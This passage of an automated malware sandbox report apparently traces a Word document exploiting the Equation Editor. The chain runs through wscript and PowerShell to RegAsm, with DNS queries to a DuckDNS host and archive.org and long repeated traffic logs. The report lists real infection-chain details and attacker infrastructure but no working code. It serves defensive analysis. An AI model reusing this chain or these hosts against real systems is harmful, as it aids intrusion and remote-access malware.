              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3764, type: MEMORYSTR
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 107.175.242.80 Port: 80Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

              Privilege Escalation

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004074FD _wcslen,CoGetObject,9_2_004074FD
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.22:49162 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000008.00000002.381541630.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.378809555.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409253
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C291
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C34D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409665
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E879 FindFirstFileExA,9_2_0044E879
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_0040880C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040783C FindFirstFileW,FindNextFileW,9_2_0040783C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419AF5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD37
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407C97

              Software Vulnerabilities

              barindex
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Source: global trafficDNS query: name: ia600100.us.archive.org
              Source: global trafficDNS query: name: 2024remcmon.duckdns.org
              Source: global trafficDNS query: name: geoplugin.net
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.242.80:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 178.237.33.50:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
